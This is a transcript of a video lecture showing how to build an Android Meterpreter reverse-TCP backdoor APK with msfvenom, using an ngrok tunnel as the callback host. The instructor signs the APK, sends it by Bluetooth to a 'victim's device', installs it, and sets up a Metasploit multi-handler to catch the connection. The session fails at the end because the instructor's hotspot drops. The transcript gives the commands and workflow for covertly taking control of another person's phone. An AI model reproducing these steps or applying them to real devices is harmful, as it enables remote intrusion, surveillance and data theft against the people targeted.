Due to some network issue, my internet was turned off, and so the NGROC session was closed. So I am again following the procedure as I have explained in our last video lecture. So do follow the step once again and you'll see your L port in the port forwarding will be different as we are creating a new session. So let's begin. As you can see, I have turned on my hotspot, and once again I'll try to establish a session, and yes, the session has been established. And this time you can see the forwarding, the port is 14189. Will come once again there. Okay, so now let's start with creating the payload. We'll just go inside our Metasploit framework, then we'll use MSFVenom. The procedure is same, so yeah, we're inside now Metasploit framework. As you can see, still the hotspot is on. Okay, so MSFVenom -p android /meterpreter /reverse_TCP. The LHOST, we need to copy it from the session, till IO, from TCP till IO. You can see 14189 is your L port now. Okay, so we'll paste the LHOST and then we'll write give our L port. So L port 14189. So L port is 14189. So -O for output, and then we'll provide the location. So /SD card, that is our internal storage, and then our APK name. So ngrock test.apk you can say, and hit enter. Just wait for few seconds. Just make sure your hotspot is still on, otherwise this will again fail. Okay, so wait for few seconds. Yes, your APK has been generated successfully. As you can see, I am again inside the MI Explorer, and inside that we have internal storage, and inside internal storage we have ngrock test.apk which we have created. So we'll just sign it and send it to our victim via Bluetooth. We'll try once again. Make sure your hotspot and data is perfectly turned on. Now as you can see, we are again inside our victim's device, and there is one incoming file which is known as ngrock_test.signed.apk which we are sending from an attacker to the victim's device, and we'll follow the procedure. Follow the steps as we did for the LAN. Now as we can see, we have successfully installed the APK in our victim's device. Now we'll come back to our attacker device and start the Metasploit. Now as you can see, we are inside the attacker's device, and from here we'll type MSF console and hit enter. So you can see the Metasploit framework console will start. So we'll check the database. So db_status, so the database is connected. Alright, so rest the procedure is almost the same. Use exploit Android. So as we are using the exploit for the Android, so we'll use multi-handler, and then we'll set the LHOST and the L port. Okay, first we have written use exploit multi-handler, then set payload Android meterpreter, as we are using the Android, and we're using reverse TCP. Okay, so now we'll provide the LHOST. So set LHOST equals to, we'll go to the another session, and yes, we'll copy this forwarding. So make sure you copy correctly. Okay, it starts from 0.tcp.ngrock.io. okay, you should not copy from the starting like HTTP and everything. Okay, now next we'll provide the L port. So L port here will provide 4040. Make sure you're providing the L port which we have given in our starting. L port here would be the port from our, just see the hotspot turned off. Okay, so now again we need to create the session once again. Since our hotspot turned off, once again we'll face the problem. So make sure that when you are setting the L port, you are giving the port number of your device, which we have provided at the starting. So we provided 4040, right? 4040. So we are providing L port here 4040. Yes, as you can see, the session was not created because our hotspot was turned off. As you can see, since my hotspot is since my hotspot is getting turned off, so therefore I am not able to create the session. But if you are not facing the hotspot off issue, then you will be successfully starting the session. So whosoever is facing the same issue like hotspot is turning off, so in the next video I'll show you how you can use your Wi-Fi to create the payload. So thank you so much and see you in the next class.